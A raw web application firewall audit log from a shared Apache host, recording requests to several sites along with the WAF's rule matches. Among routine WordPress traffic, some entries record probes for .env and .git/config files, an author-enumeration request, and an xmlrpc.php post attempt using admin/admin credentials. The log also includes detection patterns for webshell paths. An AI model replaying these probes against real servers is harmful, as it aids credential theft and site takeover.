x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --50b1c572-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --50b1c572-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751337898840669 56205 (- - -) Stopwatch2: 1751337898840669 56205; combined=2991, p1=151, p2=2656, p3=0, p4=0, p5=184, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --394f2562-Z-- --4a08d220-A-- [01/Jul/2025:08:14:59.291736 +0530] aGNLqcEIEZFNpjXUoBInigAAACw 103.185.74.40 53462 192.168.74.40 443 --4a08d220-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --4a08d220-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --4a08d220-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751337897861518 1430924 (- - -) Stopwatch2: 1751337897861518 1430924; combined=2236, p1=118, p2=1948, p3=0, p4=0, p5=169, sr=50, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --4a08d220-Z-- --50b1c572-A-- [01/Jul/2025:08:14:59.956224 +0530] aGNLqhBD6plbSAZbX5RS4QAAAA8 68.183.152.21 51865 192.168.74.40 443 --50b1c572-B-- GET //?author=2 HTTP/1.1 Host: kutility.com Keep-Alive: 300 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Accept-Language: en-US,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 --50b1c572-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Keep-Alive: timeout=5, max=100 Connection: Keep-Alive -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751339736981430 14655 (- - -) Stopwatch2: 1751339736981430 14655; combined=2768, p1=145, p2=2460, p3=0, p4=0, p5=163, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --7d9b855f-Z-- --9b6a835b-A-- [01/Jul/2025:08:45:39.689175 +0530] aGNS08jpJEqv1Qd8u_SFIQAAADc 103.185.74.40 4613 192.168.74.40 443 --9b6a835b-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --9b6a835b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --9b6a835b-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751339731136985 8552816 (- - -) Stopwatch2: 1751339731136985 8552816; combined=2901, p1=86, p2=2613, p3=0, p4=0, p5=183, sr=53, sw=19, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --9b6a835b-Z-- --cb766070-A-- [01/Jul/2025:08:45:40.195841 +0530] aGNS2EY5SfbFVO4WKgSSTAAAAAo 103.185.74.40 62189 192.168.74.40 443 --cb766070-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --cb766070-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --cb766070-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751339736138141 4058215 (- - -) Stopwatch2: 1751339736138141 4058215; combined=2095, p1=82, p2=1860, p3=0, p4=0, p5=153, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --cb766070-Z-- --cd4cc77b-A-- [01/Jul/2025:08:45:40.294812 +0530] aGNS3JhasU9Fd1tVN-9MiAAAAAc 170.106.148.137 53964 192.168.74.40 80 --cd4cc77b-B-- GET / HTTP/1.1 Host: www.oricast.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --6dc1f11b-Z-- --c5162020-A-- [01/Jul/2025:09:19:37.831794 +0530] aGNa0apiZ00_S-DQtUqQywAAAA0 162.243.75.54 46370 192.168.74.40 80 --c5162020-B-- GET /.git/config HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* Accept-Encoding: gzip --c5162020-F-- HTTP/1.1 404 Not Found Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Transfer-Encoding: chunked Content-Type: text/html --c5162020-H-- Message: Match of "rx /wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/backups.min.js" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/002_i360_basic.conf"] [line "12"] [id "77140739"] [msg "IM360 WAF: [RBL] Dirb like fuzzing||MVN:REQUEST_URI||MV:/.git/config||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Message: String match "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "349"] [id "77318034"] [msg "IM360 WAF: Blocked access to git folder||RSV:7.05||RS:0||T:APACHE||MV:/.git/config||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: default-handler Stopwatch: 1751341777819947 12099 (- - -) Stopwatch2: 1751341777819947 12099; combined=4511, p1=118, p2=4238, p3=0, p4=0, p5=154, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --c5162020-Z-- --db184808-A-- [01/Jul/2025:09:19:38.354020 +0530] aGNa0ifVvbXKOf71QoDLAwAAABE 162.243.75.54 46380 192.168.74.40 80 --db184808-B-- GET /.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* Accept-Encoding: gzip --db184808-F-- HTTP/1.1 403 Forbidden Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Transfer-Encoding: chunked Content-Type: text/html --db184808-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G: P: F:||RSV:7.05||RS:403||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Action: Intercepted (phase 2) Apache-Handler: default-handler Stopwatch: 1751341778349967 4268 (- - -) Stopwatch2: 1751341778349967 4268; combined=1264, p1=109, p2=605, p3=0, p4=0, p5=550, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --db184808-Z-- --d31d4678-A-- [01/Jul/2025:09:19:38.611340 +0530] aGNa0gOhMQ_WrfEBMDsEpAAAAC0 20.171.207.232 34616 192.168.74.40 443 --d31d4678-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/aainag/images/hotels-in-rajasthan.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --d31d4678-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --d31d4678-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/aainag/images/hotels-in-rajasthan.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/aainag/images/hotels-in-rajasthan.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/rajasthan-tours-from-Jaisalmer||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751341778592907 18529 (- - -) Stopwatch2: 1751341778592907 18529; combined=4332, p1=177, p2=3967, p3=0, p4=0, p5=187, sr=62, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751343915954750 1110537 (- - -) Stopwatch2: 1751343915954750 1110537; combined=3661, p1=140, p2=3329, p3=0, p4=0, p5=192, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --d75a8660-Z-- --11c69c59-A-- [01/Jul/2025:09:55:22.790955 +0530] aGNjMlbzRQNq4bHvdUEa0QAAAB4 103.185.74.40 34157 192.168.74.40 443 --11c69c59-B-- POST /wp-cron.php?doing_wp_cron=1751343922.5536429882049560546875 HTTP/1.1 Host: thewizblog.com User-Agent: WordPress/6.8.1; https://thewizblog.com Accept: */* Accept-Encoding: deflate, gzip Connection: close Content-Length: 0 Content-Type: application/x-www-form-urlencoded --11c69c59-C-- --11c69c59-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --11c69c59-H-- Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G:doing_wp_cron=1751343922.5536429882049560546875& P: F:||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751343922768846 23938 (- - -) Stopwatch2: 1751343922768846 23938; combined=7238, p1=205, p2=6271, p3=237, p4=4, p5=520, sr=50, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --11c69c59-Z-- --2b7cc37c-A-- [01/Jul/2025:09:55:22.813827 +0530] aGNjMP7a9-MbDP0GTS8zQgAAABA 36.224.220.27 6498 192.168.74.40 443 --2b7cc37c-B-- POST /xmlrpc.php HTTP/1.1 Connection: Keep-Alive Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: zh-Hant-TW,zh-Hant;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Content-Length: 680 Host: brewandfly.com --2b7cc37c-C-- <?xml version="1.0"?><methodCall><methodName>metaWeblog.newPost</methodName><params><param><value><string>1</string></value></param><param><value><string>admin</string></value></param><param><value><string>admin</string></value></param><param><value><struct><member><name>title</name><value><string>0x1c8c5b6a</string></value></member><member><name>description</name><value><string>0x1c8c5b6a</string></value></member><member><name>mt_keywords</name><value><string>0x1c8c5b6a</string></value></member><member><name>mt_excerpt</name><value><string>0x1c8c5b6a</string></value></member></struct></value></param><param><value><boolean>1</boolean></value></param></params></methodCall> --2b7cc37c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751344320105815 16971 (- - -) Stopwatch2: 1751344320105815 16971; combined=2742, p1=108, p2=2461, p3=0, p4=0, p5=173, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --075bb601-Z-- --48b7ad79-A-- [01/Jul/2025:10:02:00.124596 +0530] aGNkwPdfsj9lloMIsSmhVwAAAAQ 103.185.74.40 4458 192.168.74.40 443 --48b7ad79-B-- POST /wp-cron.php?doing_wp_cron=1751344319.8891799449920654296875 HTTP/1.1 Host: shreyamouldcrafts.com User-Agent: WordPress/6.8.1; https://shreyamouldcrafts.com Accept: */* Accept-Encoding: deflate, gzip Connection: close Content-Length: 0 Content-Type: application/x-www-form-urlencoded --48b7ad79-C-- --48b7ad79-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --48b7ad79-H-- Message: Pattern match "fff[7-9a-d]$" at UNIQUE_ID. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "193"] [id "77316842"] [msg "IM360 WAF: Performance measurement||Method:POST||Perf all:combined=7833, p1=380, p2=7227, p3=222, p4=4, p5=0, sr=108, sw=0, l=0, gc=0||Py scan:15955||Lua scan:||RBL:||RSV:7.05||RS:200||T:APACHE||Content-Length:0||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751344320096373 28680 (- - -) Stopwatch2: 1751344320096373 28680; combined=8102, p1=380, p2=7227, p3=222, p4=4, p5=268, sr=108, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --48b7ad79-Z-- --569c0f2f-A-- [01/Jul/2025:10:02:01.723144 +0530] aGNkwbjtQEgMl2VdjwuWhQAAAA0 57.141.0.23 38950 192.168.74.40 443 --569c0f2f-B-- GET /Packages/Rajasthan-Travel-Guides/rajasthan-tours-from-agra/rajasthan-tours-from-agra/images/Rajasthan-Travel-Guides/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/Shekhawati-City-Guide.php HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive --569c0f2f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --569c0f2f-H-- -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --4b9a9258-Z-- --2c0eaa26-A-- [01/Jul/2025:10:07:15.173348 +0530] aGNl-iEfn2nueSOFoWcnWQAAABk 196.251.83.206 57316 192.168.74.40 443 --2c0eaa26-B-- GET /.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Linux; Android 5.1; OPPO A59s Build/LMY47I; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 MQQBrowser/6.2 TBS/044813 Mobile Safari/537.36 MMWEBID/6148 MicroMessenger/7.0.6.1460(0x27000634) Process/tools NetType/WIFI Language/zh_CN Accept-Charset: utf-8 Accept-Encoding: gzip Connection: close --2c0eaa26-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Encoding: gzip Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --2c0eaa26-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751344634398305 775476 (- - -) Stopwatch2: 1751344634398305 775476; combined=759, p1=94, p2=517, p3=0, p4=0, p5=148, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --2c0eaa26-Z-- --e49c647c-A-- [01/Jul/2025:10:07:18.537464 +0530] aGNl_LyvB-Gc8S6YH6T5DgAAACE 150.109.230.210 43062 192.168.74.40 80 --e49c647c-B-- GET / HTTP/1.1 Host: archanacomponents.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --e49c647c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --e49c647c-H-- -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --f0cb221f-Z-- --ccae4908-A-- [01/Jul/2025:10:09:08.642977 +0530] aGNmbNOCUIdzZW29MeQ4hwAAAC8 43.156.109.53 51390 192.168.74.40 80 --ccae4908-B-- GET / HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --ccae4908-F-- HTTP/1.1 200 OK Last-Modified: Wed, 17 Jun 2020 20:01:33 GMT Accept-Ranges: bytes Content-Length: 163 Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html --ccae4908-H-- Message: Pattern match "\\b(close|keep-alive),[\\t\\n\\r ]{0,1}(close|keep-alive)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/013_i360_generic.conf"] [line "86"] [id "77210350"] [msg "IM360 WAF: Multiple/Conflicting Connection Header Data Found||MVN:REQUEST_HEADERS:Connection||MV:keep-alive, close||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "\\b(?:keep-alive|close),\\s?(?:keep-alive|close)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "138"] [id "77350508"] [msg "IM360 WAF: Suspicious Connection Header||MV:keep-alive, close||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Stopwatch: 1751344748637420 6069 (- - -) Stopwatch2: 1751344748637420 6069; combined=2873, p1=102, p2=2541, p3=91, p4=2, p5=137, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ccae4908-Z-- --35720e1f-A-- [01/Jul/2025:10:09:08.756894 +0530] aGNmbCQiesNCQGCD2TgXFwAAADY 18.213.102.186 2376 192.168.74.40 443 --35720e1f-B-- GET /pps/product/sbrite-microfiber-multipurpose-wipe HTTP/1.1 Connection: close Host: bmschool.in User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --35720e1f-F-- HTTP/1.1 403 Forbidden Content-Length: 318 Connection: close Content-Type: text/html; charset=iso-8859-1 --35720e1f-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "432"] [id "77350440"] [msg "IM360 WAF: Scan attempt by Amazon bot||Range:||RSV:7.05||RS:0||T:APACHE||"] [severity "CRITICAL"] [tag "service_im360"] Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G: P: F:||RSV:7.05||RS:403||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Action: Intercepted (phase 2) -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751345110511978 1319954 (- - -) Stopwatch2: 1751345110511978 1319954; combined=4244, p1=103, p2=3385, p3=0, p4=0, p5=755, sr=47, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --f28c312f-Z-- --21b61c3b-A-- [01/Jul/2025:10:15:14.298899 +0530] aGNn2U2iOLYJJIAs-GUhWQAAADY 103.185.74.40 59990 192.168.74.40 443 --21b61c3b-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --21b61c3b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --21b61c3b-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751345113014920 1284398 (- - -) Stopwatch2: 1751345113014920 1284398; combined=2870, p1=97, p2=2541, p3=0, p4=0, p5=232, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --21b61c3b-Z-- --b889760f-A-- [01/Jul/2025:10:15:15.673507 +0530] aGNn2otSrxFvROx86UNn7AAAABg 103.185.74.40 35627 192.168.74.40 443 --b889760f-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --b889760f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --b889760f-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751345114508797 1165139 (- - -) Stopwatch2: 1751345114508797 1165139; combined=2625, p1=98, p2=2346, p3=0, p4=0, p5=181, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for 